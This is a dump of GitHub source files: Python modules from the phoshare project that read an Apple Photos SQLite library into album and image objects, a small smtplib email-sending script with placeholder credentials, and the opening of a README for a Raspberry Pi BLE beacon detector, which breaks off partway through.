"text": "# -*- coding: utf-8 -*-\n'''Reads Photo SQLite database'''\n\n# Original work Copyright 2010 Google Inc.\n# Modified work Copyright 2014 Luke Hagan\n# Modified work Copyright 2017 Benjamín Valero\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Modifications to original source:\n#\n# 2014-06-04: retrieve keywords from iPhoto database using sqlite\n# 2017-01-14: retrieve all necessary data entirely from Photos SQLite database\n \nimport calendar\nimport datetime\nimport unicodedata\nimport os\nimport sys\nimport sqlite3\n\nimport tilutil.systemutils as su\n\n\nAPPLE_BASE = calendar.timegm((2001, 1, 1, 0, 0, 0, 0, 0, -1))\nAPPLE_BASE2 = datetime.datetime.fromtimestamp(calendar.timegm((2001, 1, 1, 0, 0, 0)))\n\n\ndef getappletime(value):\n '''Converts a numeric Apple time stamp into a date and time'''\n try:\n # datetime.datetime.fromtimestamp() takes only int, which limits it to 12/13/1901\n # as the earliest possible date. Use an alternate calculation for earlier dates.\n # This one however adjusts for daylight savings time, so summer times are off by an\n # hour from the time recorded in Photos.\n if APPLE_BASE + float(value) < -sys.maxint:\n return APPLE_BASE2 + datetime.timedelta(seconds=float(value))\n return datetime.datetime.fromtimestamp(APPLE_BASE + float(value))\n except (TypeError, ValueError) as _e:\n # bad time stamp in database, default to \"now\"\n return datetime.datetime.now()\n\n\ndef get_photos_library_file(library_dir):\n \"\"\"Locates the Photos Library.apdb file.\"\"\"\n if os.path.exists(library_dir) and os.path.isdir(library_dir):\n photos_library_file = os.path.join(library_dir, \"database\", \"Library.apdb\")\n if os.path.exists(photos_library_file):\n return photos_library_file\n raise ValueError((\"%s does not appear to be a valid Photos \"\n \"library location.\") % library_dir)\n\n\ndef get_photos_metaschema_file(library_dir):\n \"\"\"Locates the Photos metaSchema.db file.\"\"\"\n if os.path.exists(library_dir) and os.path.isdir(library_dir):\n photos_metaschema_file = os.path.join(library_dir, \"database\", \"metaSchema.db\")\n if os.path.exists(photos_metaschema_file):\n return photos_metaschema_file\n raise ValueError((\"%s does not appear to be a valid Photos \"\n \"library location.\") % library_dir)\n\n\ndef get_photos_imageproxies_file(library_dir):\n \"\"\"Locates the Photos ImageProxies.apdb file.\"\"\"\n if os.path.exists(library_dir) and os.path.isdir(library_dir):\n photos_imageproxies_file = os.path.join(library_dir, \"database\", \"ImageProxies.apdb\")\n if os.path.exists(photos_imageproxies_file):\n return photos_imageproxies_file\n raise ValueError((\"%s does not appear to be a valid Photos \"\n \"library location.\") % library_dir)\n\n\ndef read_apple_library(photos_library_dir):\n photos_dict = {}\n\n photos_metaschema_file = get_photos_metaschema_file(photos_library_dir)\n photos_imageproxies_file = get_photos_imageproxies_file(photos_library_dir)\n photos_library_file = get_photos_library_file(photos_library_dir)\n\n if 
photos_metaschema_file:\n # Library Version\n library_version = None\n conn1 = sqlite3.connect(photos_metaschema_file)\n c1 = conn1.cursor()\n c1.execute('select value from LiGlobals where keyPath is ?', (\"libraryCompatibleBackToVersion\",))\n for result in c1.fetchall():\n library_version = int(result[0])\n photos_dict['Application Version'] = library_version\n\n if photos_imageproxies_file:\n # Resources\n conn3 = sqlite3.connect(photos_imageproxies_file)\n c3 = conn3.cursor()\n c3.execute('select attachedModelId, resourceUuid, filename from RKModelResource '\n 'where attachedModelType = 2 and resourceType = 4')\n resources_dict = {}\n for result in c3.fetchall():\n attached_model_id = int(result[0])\n resource_dict = {}\n resource_dict['resource_uuid'] = result[1]\n resource_dict['filename'] = unicodedata.normalize(\"NFC\", result[2])\n resources_dict[attached_model_id] = resource_dict\n\n if photos_metaschema_file:\n # Folders\n conn2 = sqlite3.connect(photos_library_file)\n c2 = conn2.cursor()\n c2.execute('select uuid, modelId, name, folderPath from RKFolder '\n 'where folderType = 1 and isInTrash = 0 and isMagic = 0')\n folders_by_id = {}\n folders_by_uuid = {}\n for result in c2.fetchall():\n uuid = result[0]\n model_id = int(result[1])\n folder_dict = {}\n folder_dict['name'] = result[2]\n folder_dict['folderPath'] = result[3]\n folders_by_uuid[uuid] = folder_dict\n folders_by_id[model_id] = folder_dict\n\n # Albums\n c2 = conn2.cursor()\n c2.execute('select modelId, name, folderUuid, recentUserChangeDate'\n ' from RKAlbum where albumType = 1 and albumSubclass = 3'\n ' and isInTrash = 0 and isMagic = 0')\n albums = []\n albums_by_id = {}\n for result in c2.fetchall():\n album_id = int(result[0])\n album_data = {}\n album_data['AlbumName'] = unicodedata.normalize(\"NFC\", result[1])\n album_data['AlbumDate'] = getappletime(result[3])\n album_data['KeyList'] = []\n\n # Load folder path\n album_data['FolderPath'] = None\n album_folder_uuid = result[2]\n if album_folder_uuid in folders_by_uuid:\n album_folder = folders_by_uuid[album_folder_uuid]\n parent_folder_ids = album_folder['folderPath']\n folder_path = ''\n for folder_id in parent_folder_ids.split('/'):\n if folder_id and (int(folder_id) in folders_by_id):\n parent_folder = folders_by_id[int(folder_id)]\n folder_path = os.path.join(folder_path, parent_folder['name'])\n album_data['FolderPath'] = folder_path\n\n albums.append(album_data)\n albums_by_id[album_id] = album_data\n photos_dict['List of Albums'] = albums\n\n # Versions\n c2 = conn2.cursor()\n c2.execute('select modelId, name, imageDate, createDate from RKVersion where isInTrash = 0')\n versions_dict = {}\n for result in c2.fetchall():\n model_id = int(result[0])\n version_dict = {}\n version_name = None\n if result[1]:\n version_name = unicodedata.normalize(\"NFC\", result[1])\n version_dict['VersionName'] = version_name\n if result[2]:\n version_dict['VersionDate'] = getappletime(result[2])\n else:\n version_dict['VersionDate'] = getappletime(result[3])\n versions_dict[model_id] = version_dict\n\n # Masters\n c2 = conn2.cursor()\n c2.execute('select modelId, imagePath from RKMaster '\n 'where importComplete = 1 and isInTrash = 0')\n masters_dict = {}\n for result in c2.fetchall():\n model_id = int(result[0])\n master_dict = {}\n master_dict['ImagePath'] = unicodedata.normalize(\"NFC\", result[1])\n masters_dict[model_id] = master_dict\n\n # Images\n images = {}\n for master_id in masters_dict:\n image_data = {}\n\n master_dict = masters_dict[master_id]\n 
original_path = os.path.join(photos_library_dir, 'Masters', master_dict['ImagePath'])\n\n if master_id in resources_dict:\n resource_dict = resources_dict[master_id]\n resource_uuid = resource_dict['resource_uuid']\n folder1 = str(ord(resource_uuid[0]))\n folder2 = str(ord(resource_uuid[1]))\n filename = resource_dict['filename']\n image_data['ImagePath'] = os.path.join(photos_library_dir, 'resources', 'modelresources',\n folder1, folder2, resource_uuid, filename)\n image_data['OriginalPath'] = original_path\n else:\n image_data['ImagePath'] = original_path\n\n version_dict = versions_dict[master_id]\n image_data['Caption'] = version_dict['VersionName']\n image_data['ImageDate'] = version_dict['VersionDate']\n images[master_id] = image_data\n photos_dict['Master Image List'] = images\n\n # TODO Keywords\n photos_dict['List of Keywords'] = []\n\n # Album-Versions\n c2 = conn2.cursor()\n c2.execute('select albumId, versionId from RKAlbumVersion')\n for result in c2.fetchall():\n album_id = int(result[0])\n version_id = int(result[1])\n\n if album_id in albums_by_id:\n album_data = albums_by_id[album_id]\n album_data['KeyList'].append(version_id)\n\n return photos_dict\n"
},
{
"alpha_fraction": 0.5523218512535095,
"alphanum_fraction": 0.559426486492157,
"avg_line_length": 33.010189056396484,
"blob_id": "d40acf53a857b8638fa006b288554f4086009fa4",
"content_id": "2660079410b9104d95a9ad7be664f4a500756bc1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23365,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 687,
"path": "/appledata/iphotodata.py",
"repo_name": "benjavalero/phoshare",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n'''Photos database: reads Photos database and parses it into albums and images.\n\n@author: [email protected]\n\nThis class reads Photos image, album and folder information from the SQLite\ndatabase in the Photos library directory. That file is written by Photo\nfor the media browser in other applications. Images in Photos are grouped using\nalbums and folders. An image may be in several albums (at least in the \"root\" album)\nand each album in a folder tree.\n\nThe album types are:\nFlagged - flagged pictures\nFolder - contains other albums\nPublished - an album published to MobileMe\nRegular - a regular user created album\nSelectedEventAlbum - most recent album (as shown in iPhoto)\nShelf - list of flagged images\nSmart - a user created smart album\nSpecialMonth - \"Last Month\"\nSpecialRoll - \"Last Import\"\nEvent - this type does not exist in the XML file, but we use it in this code\n to allow us to treat events just like any other album\nFace - Face album (does not exist in iPhoto, only in this code).\nNone - should not really happen\n'''\n\n# Original work Copyright 2010 Google Inc.\n# Modified work Copyright 2014 Luke Hagan\n# Modified work Copyright 2017 Benjamín Valero\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Modifications to original source:\n#\n# 2014-06-04: retrieve keywords from iPhoto database using sqlite;\n# fix a bug in copying of originals\n# 2017-01-14: retrieve all necessary data entirely from Photos SQLite database\n#\n\nimport datetime\nimport os\nimport re\nimport sys\n\nimport appledata.applexml as applexml\nimport tilutil.imageutils as imageutils\nimport tilutil.systemutils as su\n\n# List of extensions for image formats that are considered JPEG.\n'''\n_JPG_EXTENSIONS = ('jpg', 'jpeg')\n\n\n# Convert Aperture numeric album types to iPhoto album type names.\n_APERTURE_ALBUM_TYPES = {\n '1': 'Regular',\n '2': 'Smart',\n '3': 'Special',\n '4': 'Event',\n '5': 'Library',\n '6': 'Folder',\n '8': 'Book',\n '9': 'WebPage',\n '10':'WebJournal',\n '11': 'LightTable',\n '13': 'SmartWebPage',\n '14': 'MobileMeAccount',\n '15': 'MobileMeAlbum',\n '16': 'FlickrAccount',\n '17': 'FlickrAlbum',\n '18': 'OnlineAccount',\n '19': 'Slideshow',\n '20': 'Published',\n # Patching up some albums that are stored with no album type.\n 'Last Import': 'Special',\n 'Recovered Photos': 'Special',\n}\n\ndef parse_face_rectangle(string_data):\n \"\"\"Parse a rectangle specification into an array of coordinate data.\n\n Args:\n string_data: Rectangle like '{{x, y}, {width, height}}'\n\n Returns:\n Array of x, y, width and height as floats.\n \"\"\"\n try:\n return [float(entry.strip('{} ')) for entry in string_data.split(',')]\n except ValueError:\n print >> sys.stderr, 'Failed to parse rectangle ' + string_data\n return [ 0.4, 0.4, 0.2, 0.2 ]\n'''\n\n\nclass IPhotoData(object):\n \"\"\"top level Photos data node.\"\"\"\n\n def __init__(self, photos_dict):\n \"\"\"# call with results of readAppleXML.\"\"\"\n self.data = photos_dict\n\n self.albums = 
{}\n\n \"\"\"\n self.face_albums = None\n \"\"\"\n\n # Master map of keywords\n self.keywords = self.data.get(\"List of Keywords\")\n\n self.face_names = {} # Master map of faces\n \"\"\"\n face_list = self.data.get(\"List of Faces\")\n if face_list:\n for face_entry in face_list.values():\n face_key = face_entry.get(\"key\")\n face_name = face_entry.get(\"name\")\n self.face_names[face_key] = face_name\n # Other keys in face_entry: image, key image face index,\n # PhotoCount, Order\n \"\"\"\n\n self.images_by_id = {}\n image_data = self.data.get(\"Master Image List\")\n if image_data:\n for key in image_data:\n image = IPhotoImage(key, image_data.get(key), self.keywords,\n self.face_names)\n self.images_by_id[key] = image\n\n album_data = self.data.get(\"List of Albums\")\n\n self.root_album = IPhotoContainer(\"\", \"Root\", None, None)\n for data in album_data:\n album = IPhotoAlbum(data, self.images_by_id, self.albums, self.root_album)\n self.albums[album.albumid] = album\n\n \"\"\"\n self.images_by_base_name = None\n self.images_by_file_name = None\n \"\"\"\n\n '''\n def _build_image_name_list(self):\n self.images_by_base_name = {}\n self.images_by_file_name = {}\n\n # build the basename map\n for image in self.images_by_id.values():\n base_name = image.getbasename()\n other_images = self.images_by_base_name.get(base_name)\n if other_images is None:\n other_images = []\n self.images_by_base_name[base_name] = other_images\n other_images.append(image)\n\n imagename = image.getimagename()\n other_image_list = self.images_by_file_name.get(imagename)\n if other_image_list is None:\n other_image_list = []\n self.images_by_file_name[imagename] = other_image_list\n other_image_list.append(image)\n '''\n\n def _getapplicationversion(self):\n return self.data.get(\"Application Version\")\n applicationVersion = property(_getapplicationversion, doc='Photos library version')\n\n def _getimages(self):\n return self.images_by_id.values()\n images = property(_getimages, doc=\"List of images\")\n\n '''\n def _getrolls(self):\n return self._rolls.values()\n rolls = property(_getrolls, \"List of rolls (events)\")\n\n def getroll(self, album_id):\n return self._rolls.get(album_id) \n\n def getbaseimages(self, base_name):\n \"\"\"returns an IPhotoImage list of all images with a matching base name.\n \"\"\"\n if not self.images_by_base_name:\n self._build_image_name_list()\n return self.images_by_base_name.get(base_name)\n\n def getnamedimage(self, file_name):\n \"\"\"returns an IPhotoImage for the given file name.\"\"\"\n if not self.images_by_file_name:\n self._build_image_name_list()\n image_list = self.images_by_file_name.get(file_name)\n if image_list:\n return image_list[0]\n return None\n\n def getallimages(self):\n \"\"\"returns map from full path name to image.\"\"\"\n image_map = {}\n for image in self.images_by_id.values():\n image_map[image.GetImagePath()] = image\n image_map[image.thumbpath] = image\n if image.originalpath is not None:\n image_map[image.originalpath] = image\n return image_map\n\n\n def check_photos(self):\n \"\"\"Attempts to verify that the data are not corrupt by checking the \"Photos\" album\n against the image list.\n \"\"\"\n photos = None\n for album in self.albums.values():\n if album.master:\n photos = album\n break\n if not photos:\n su.pout(\"No Photos album in library.\")\n return\n # Check size of Photos album vs. 
Master Image List\n if photos.size != len(self.images_by_id):\n su.pout(\"Warning: Master image list has %d images, but Photos album has %d images.\" % (\n len(self.images_by_id), photos.size))\n # Cross check Photos vs. Master Image List\n photos_ids = {}\n for photo in photos.images:\n photos_ids[photo.id] = photo # Make a map of Photos by id for the second phase below\n if not self.images_by_id.has_key(photo.id):\n su.pout(\"Warning: only in Photos album, but not in Master Image List: %s\" % (\n photo.caption))\n print photo\n for image in self.images:\n if not photos_ids.has_key(image.id):\n su.pout(\"Warning: only in Master Image List, but not in Photos album: %s\" % (\n image.caption))\n print image\n\n\n def check_inalbums(self):\n \"\"\"Checks that all images are in albums according to their events.\"\"\"\n messages = []\n for image in self.images_by_id.values():\n if image.IsHidden():\n continue\n roll_name = self._rolls[image.roll].name\n albums = []\n in_album = False\n\n for album in image.GetAlbums():\n album_name = album.name\n if album.GetAlbumType == \"Regular\":\n albums.append(album.name)\n in_album = True\n if album_name != roll_name:\n messages.append(image.caption + \": in wrong album (\" +\n roll_name + \" vs. \" + album_name + \").\")\n elif (album.isSmart() and album_name.endswith(\" Collection\") or\n album_name == \"People\" or album_name == \"Unorganized\"):\n in_album = True\n if not in_album:\n messages.append(image.caption + \": not in any album.\")\n if albums:\n messages.append(image.caption + \": in more than one album: \" +\n \" \".join(albums))\n messages.sort()\n for message in messages:\n print message\n\n def getfacealbums(self):\n \"\"\"Returns a map of albums for faces.\"\"\"\n if self.face_albums:\n return self.face_albums.values()\n\n # Build the albums on first call\n self.face_albums = {}\n\n for image in self.images:\n for face in image.getfaces():\n face_album = self.face_albums.get(face)\n if not face_album:\n face_album = IPhotoFace(face)\n self.face_albums[face] = face_album\n face_album.addimage(image)\n return self.face_albums.values()\n\n\n def print_summary(self):\n named_rolls = {}\n for roll in self._rolls.values():\n named_rolls[roll.name] = roll\n for roll in sorted(named_rolls.keys()):\n named_rolls[roll].print_summary()\n named_albums = {}\n for album in self.albums.values():\n named_albums[album.name] = album\n for album in sorted(named_albums):\n named_albums[album].print_summary()\n '''\n\n'''\n_CAPTION_PATTERN = re.compile(\n r'([12][0-9][0-9][0-9])([01][0-9])([0123][0-9]) (.*)')\n'''\n\nclass IPhotoImage(object):\n \"\"\"Describes an image in the Photos database.\"\"\"\n\n def __init__(self, key, data, keyword_map, face_map):\n '''\n self.id = key\n self.data = data\n '''\n self._caption = su.nn_string(data.get(\"Caption\")).strip()\n '''\n self.comment = su.nn_string(data.get(\"Comment\")).strip()\n '''\n\n self.date = None\n if \"ImageDate\" in data:\n self.date = data.get(\"ImageDate\")\n '''\n else:\n # Try to get the date from a the caption in \"YYYYMMDD ...\" format\n m = re.match(_CAPTION_PATTERN, self._caption)\n if m:\n year = int(m.group(1))\n month = int(m.group(2))\n if not month:\n month = 1\n date = int(m.group(3))\n if not date:\n date = 1\n self.date = datetime.datetime(year, month, date)\n else:\n self.date = None\n if data.has_key(\"ModDateAsTimerInterval\"):\n self.mod_date = applexml.getappletime(data.get(\"ModDateAsTimerInterval\"))\n else:\n if data.has_key(\"MetaModDateAsTimerInterval\"):\n self.mod_date 
= applexml.getappletime(data.get(\"MetaModDateAsTimerInterval\"))\n else:\n self.mod_Date = None\n '''\n\n self.image_path = data.get(\"ImagePath\")\n\n '''\n if data.has_key(\"Rating\"):\n self.rating = int(data.get(\"Rating\"))\n else:\n self.rating = None\n if data.get(\"longitude\"):\n latitude = float(data.get(\"latitude\"))\n longitude = float(data.get(\"longitude\"))\n self.gps = imageutils.GpsLocation(latitude, longitude)\n else:\n self.gps = None\n\n self.keywords = []\n keyword_list = data.get(\"Keywords\")\n if keyword_list is not None:\n for i in keyword_list:\n self.keywords.append(keyword_map.get(i))\n '''\n\n self.originalpath = data.get(\"OriginalPath\")\n\n '''\n self.roll = data.get(\"Roll\") \n\n self.albums = [] # list of albums that this image belongs to\n self.faces = []\n self.face_rectangles = []\n '''\n\n self.event_name = '' # name of event (roll) that this image belongs to\n self.event_index = '' # index within event\n self.event_index0 = '' # index with event, left padded with 0\n\n '''\n face_list = data.get(\"Faces\")\n if face_list:\n for face_entry in face_list:\n face_key = face_entry.get(\"face key\")\n face_name = face_map.get(face_key)\n if face_name:\n self.faces.append(face_name)\n # Rectangle is '{{x, y}, {width, height}}' as ratios,\n # referencing the lower left corner of the face rectangle,\n # with lower left corner of image as (0,0)\n rectangle = parse_face_rectangle(face_entry.get(\"rectangle\"))\n # Convert to using center of area, relative to upper left corner of image\n rectangle[0] += rectangle[2] / 2.0\n rectangle[1] = max(0.0, 1.0 - rectangle[1] - rectangle[3] / 2.0)\n self.face_rectangles.append(rectangle)\n # Other keys in face_entry: face index\n\n # Now sort the faces left to right.\n sorted_names = {}\n sorted_rectangles = {}\n for i in xrange(len(self.faces)):\n x = self.face_rectangles[i][0]\n while sorted_names.has_key(x):\n x += 0.00001\n sorted_names[x] = self.faces[i]\n sorted_rectangles[x] = self.face_rectangles[i]\n self.faces = [sorted_names[x] for x in sorted(sorted_names.keys())]\n self.face_rectangles = [\n sorted_rectangles[x] for x in sorted(sorted_rectangles.keys())]\n '''\n\n '''\n def getimagepath(self):\n \"\"\"Returns the full path to this image..\"\"\"\n return self.image_path\n '''\n\n def getimagename(self):\n \"\"\"Returns the file name of this image..\"\"\"\n name = os.path.split(self.image_path)[1]\n return name\n\n '''\n def getbasename(self):\n \"\"\"Returns the base name of the main image file.\"\"\"\n return su.getfilebasename(self.image_path)\n '''\n\n def _getcaption(self):\n if not self._caption:\n return self.getimagename()\n return self._caption\n caption = property(_getcaption, doc=\"Caption (title) of the image\")\n\n '''\n def ismovie(self):\n \"\"\"Tests if this image is a movie.\"\"\"\n return self.data.get(\"MediaType\") == \"Movie\"\n\n def addalbum(self, album):\n \"\"\"Adds an album to the list of albums for this image.\"\"\"\n self.albums.append(album)\n\n def addface(self, name):\n \"\"\"Adds a face (name) to the list of faces for this image.\"\"\"\n self.faces.append(name)\n\n def getfaces(self):\n \"\"\"Gets the list of face tags for this image.\"\"\"\n return self.faces\n\n def ishidden(self):\n \"\"\"Tests if the image is hidden (using keyword \"Hidden\")\"\"\"\n return \"Hidden\" in self.keywords\n\n def _getthumbpath(self):\n return self.data.get(\"ThumbPath\")\n thumbpath = property(_getthumbpath, doc=\"Path to thumbnail image\")\n\n def _search_for_file(self, folder_path, 
basename):\n \"\"\"Scans recursively through a folder tree and returns the path to the\n first file it finds that starts with \"basename\".\n \"\"\"\n for file_name in su.os_listdir_unicode(folder_path):\n path = os.path.join(folder_path, file_name)\n if os.path.isdir(path):\n path = self._search_for_file(path, basename)\n if path:\n return path\n elif file_name.startswith(basename):\n return path\n return None\n '''\n\n\nclass IPhotoContainer(object):\n \"\"\"Base class for IPhotoAlbum and IPhotoRoll.\"\"\"\n\n def __init__(self, name, albumtype, data, images):\n self.name = name\n\n '''\n self.uuid = None\n self.comment = None\n\n if data:\n if data.get(\"uuid\"):\n self.uuid = data.get(\"uuid\")\n if self.uuid == 'lastImportAlbum':\n albumtype = \"Special Roll\"\n if 'Comments' in data:\n self.comment = data.get(\"Comments\")\n '''\n\n # TODO Convert Photos numeric album types to type names.\n if not albumtype:\n su.pout(u'No album type for %s.' % name)\n self.albumtype = albumtype\n self.data = data\n\n '''\n self.albumid = -1\n '''\n\n self.images = []\n self.albums = []\n\n '''\n self.master = False\n '''\n\n hidden = 0\n if data and (\"KeyList\" in data):\n keylist = data.get(\"KeyList\")\n for key in keylist:\n if not key:\n continue\n image = images.get(key)\n if image:\n self.images.append(image)\n else:\n hidden += 1\n su.pout(u\"%s: image with id %s does not exist - could be hidden.\" % (name, key))\n \n if hidden:\n su.pout(u\"%s: %d images not exported (probably hidden).\" % (name, hidden))\n\n '''\n self._assign_names()\n '''\n\n '''\n def _assign_names(self):\n \"\"\"Assigns sequential index values to all images if this container is an Event.\"\"\"\n if self.albumtype != 'Event':\n return\n i = 1\n index_digits = len(str(len(self.images)))\n for image in self.images:\n image.event_name = self.name\n image.event_index = i\n image.event_index0 = str(i).zfill(index_digits)\n i += 1\n\n def merge(self, other_roll):\n for image in other_roll.images:\n self.images.append(image)\n self._assign_names()\n\n def _getsize(self):\n return len(self.images)\n size = property(_getsize, \"Gets the size (# of images) of this album.\")\n '''\n\n def getfolderhint(self):\n return self.data['FolderPath']\n\n '''\n def getcommentwithouthints(self):\n \"\"\"Gets the image comments, with any folder hint lines removed\"\"\"\n result = []\n if self.comment:\n for line in self.comment.split(\"\\n\"):\n if not line.startswith(\"@\"):\n result.append(line)\n return \"\\n\".join(result)\n '''\n\n def addalbum(self, album):\n \"\"\"adds an album to this container.\"\"\"\n self.albums.append(album)\n\n def _getdate(self):\n return self.data.get(\"AlbumDate\")\n date = property(_getdate, doc='date of container (based on oldest image)')\n\n '''\n def tostring(self):\n \"\"\"Gets a string that describes this album or event.\"\"\"\n return \"%s (%s)\" % (self.name, self.albumtype)\n\n def print_summary(self):\n if self.albumtype != \"Event\":\n return\n original_count = 0\n file_size = 0\n original_size = 0\n face_count = 0\n for image in self.images:\n face_count += len(image.getfaces())\n if image.originalpath:\n original_count += 1\n if os.path.exists(image.originalpath):\n original_size += os.path.getsize(image.originalpath)\n if os.path.exists(image.image_path):\n file_size += os.path.getsize(image.image_path)\n if not image.originalpath:\n original_size += os.path.getsize(image.image_path)\n file_size = file_size / 1024.0 / 1024.0\n original_size = original_size / 1024.0 / 1024.0\n su.pout(u\"%-50s %4d 
images (%6.1f MB), %3d originals (%6.1f MB), %3d faces\" % (\n self.tostring(), len(self.images), file_size, original_count, original_size,\n face_count))\n '''\n\n\nclass IPhotoAlbum(IPhotoContainer):\n \"\"\"Describes an Photos Album.\"\"\"\n\n def __init__(self, data, images, album_map, root_album):\n IPhotoContainer.__init__(self, data.get(\"AlbumName\"),\n data.get(\"Album Type\") if (\"Album Type\" in data) else \"Regular\",\n data, images)\n self.albumid = data.get(\"AlbumId\")\n\n # TODO NO SE QUE SIGNIFICA ESTA PROPIEDAD \"MASTER\"\n if data.has_key(\"Master\"):\n self.master = True\n\n self.parent = root_album\n self.parent.addalbum(self)\n\n\n'''\nclass IPhotoFace(object):\n \"\"\"An IPhotoContainer compatible class for a face.\"\"\"\n\n def __init__(self, face):\n self.name = face\n self.albumtype = \"Face\"\n self.albumid = -1\n self.images = []\n self.albums = []\n self.comment = \"\"\n self.date = datetime.datetime.now()\n\n def _getsize(self):\n return len(self.images)\n size = property(_getsize, \"Gets the size (# of images) of this album.\")\n\n def getfolderhint(self):\n \"\"\"Gets a suggested folder name from comments.\"\"\"\n return None\n\n def getcommentwithouthints(self):\n \"\"\"Gets the image comments, with any folder hint lines removed\"\"\"\n return \"\"\n\n def addimage(self, image):\n \"\"\"Adds an image to this container.\"\"\"\n self.images.append(image)\n # Set the face date based on the earlierst image.\n if image.date and image.date < self.date:\n self.date = image.date\n\n def tostring(self):\n \"\"\"Gets a string that describes this album or event.\"\"\"\n return \"%s (%s)\" % (self.name, self.albumtype)\n'''\n\ndef get_iphoto_data(photos_library_dir, verbose=False):\n \"\"\"reads the Photos database and converts it into an iPhotoData object.\"\"\"\n if verbose:\n print \"Reading %s database from %s...\" % ('Photos', photos_library_dir)\n\n photos_dict = applexml.read_apple_library(photos_library_dir)\n\n data = IPhotoData(photos_dict)\n\n if data.applicationVersion != 477:\n # Library version for El Capitan is 1021\n raise ValueError(\"Photos library version %s has not been tested and it's not supported\" % (\n data.applicationVersion))\n\n return data\n"
}
] | 4 |
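Both the photosdata parsing at the top of this section and iphotodata.py above lean on getappletime() (defined in the applexml module, which is not part of this excerpt) to decode date columns such as RKVersion.imageDate and RKAlbum.recentUserChangeDate. Core Data / Photos timestamps count seconds from the Apple epoch of 2001-01-01 00:00:00 rather than the Unix epoch, so a minimal sketch of such a helper could look like the following; the body is an assumption for illustration, not the phoshare implementation.

```python
import datetime

# Core Data / Photos timestamps are seconds since the Apple epoch
# (2001-01-01 00:00:00), not the Unix epoch (1970-01-01).
APPLE_EPOCH = datetime.datetime(2001, 1, 1)

def getappletime(seconds):
    """Convert an Apple Core Data timestamp into a datetime (sketch)."""
    if seconds is None:
        return None
    return APPLE_EPOCH + datetime.timedelta(seconds=float(seconds))

print(getappletime(0))          # 2001-01-01 00:00:00
print(getappletime(505440000))  # roughly 16 years after the Apple epoch
```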
PaneendraP/Python | https://github.com/PaneendraP/Python | 56d484f21fcbec9941e6b1a673a98cc07c980a15 | 9a3f5045fecd0a88033e17eb0fc0eb891e2675ef | 66283a9c12e971a1eebe9fc0829d249b4778911d | refs/heads/master | 2022-05-31T23:52:06.907395 | 2020-05-04T17:03:29 | 2020-05-04T17:03:29 | 261,244,175 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7171428799629211,
"alphanum_fraction": 0.7257142663002014,
"avg_line_length": 33,
"blob_id": "f7e5b77f58fa2e4bbd3074e0a9995b440c4bac1a",
"content_id": "6fdebde593bfd077c0337f58240da35ea564eed2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 350,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 10,
"path": "/Email_Sending.py",
"repo_name": "PaneendraP/Python",
"src_encoding": "UTF-8",
"text": "import smtplib as smtp\r\n\r\nserver=smtp.SMTP_SSL(\"smtp.gmail.com\",465)\r\nserver.login('sender_Email','sender_password') \r\nserver.sendmail(\"From\",\"To\",'Message here')\r\nserver.quit()\r\n\r\n# for gmail need to allow security...\r\n#Go to Google's Account Security Settings: www.google.com/settings/security\r\n#Access for less secure apps\". Set it to \"Allowed\".\r\n"
}
] | 1 |
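The Email_Sending.py record above pushes a bare string through sendmail(), which leaves the message without Subject/From/To headers. A hedged variant using the standard-library email.mime.text module builds a proper message first; all addresses and the password below are placeholders, not real credentials.

```python
import smtplib
from email.mime.text import MIMEText

sender = "sender@example.com"        # placeholder address
recipient = "recipient@example.com"  # placeholder address

# Build a message with proper headers instead of a raw string.
msg = MIMEText("Message body here")
msg["Subject"] = "Test mail"
msg["From"] = sender
msg["To"] = recipient

# SMTP objects support the context-manager protocol in Python 3.3+.
with smtplib.SMTP_SSL("smtp.gmail.com", 465) as server:
    server.login(sender, "app-password-here")  # placeholder credential
    server.send_message(msg)
```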
danielbertolozi/py-beacon-detection | https://github.com/danielbertolozi/py-beacon-detection | 0e1050afb1ca9906a56503c6e5be7833bc3688f0 | 26f9583deb7aaa7a8cc43c680e7a909458d37f82 | f63665c0b7b770234e0fb3a30d0336b49b87536f | refs/heads/master | 2016-08-26T00:42:18.874511 | 2016-08-11T23:07:07 | 2016-08-11T23:07:07 | 65,505,161 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.674578845500946,
"alphanum_fraction": 0.6998468637466431,
"avg_line_length": 37.411766052246094,
"blob_id": "3034f3a5bb4a4c5ea375ae79c3b55fab46289507",
"content_id": "749b02f75170b95017a3cb1d5fbb3669de16c6c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1306,
"license_type": "no_license",
"max_line_length": 174,
"num_lines": 34,
"path": "/README.md",
"repo_name": "danielbertolozi/py-beacon-detection",
"src_encoding": "UTF-8",
"text": "# py-beacon-detection\nPython script made for detecting BLE iBeacon devices and sending data in JSON to a remote server. Understand this as \"using a Raspberry as a detector for BLE enabled beacons\"\n\n## How to\n\nRead the comments in the script file. The application itself is very simple:\n* Searches for nearby devices (only BLE enabled devices)\n* Group their info in an object (which will be converted into a JSON later)\n* Group more info on that same JSON (an unique identifier (hardcoded string) for the Raspberry and the timestamp)\n* Send JSON to backend for processing\n\nThis was made for indoors detection of beacons (in a scenario where there are more than one Raspberry Pi).\nThere is an option for filtering - in which only the selected devices will be sent to the server. It can be toggleable with variable ```use_filtering```.\n\nIn order to use this script, you *must* have Bluepy installed. For more information, [please refer to the BluePy Github page](https://github.com/IanHarvey/bluepy).\n\nSample JSON obtained with this script:\n```json\n{\n \"timestamp\": \"02-08-2016 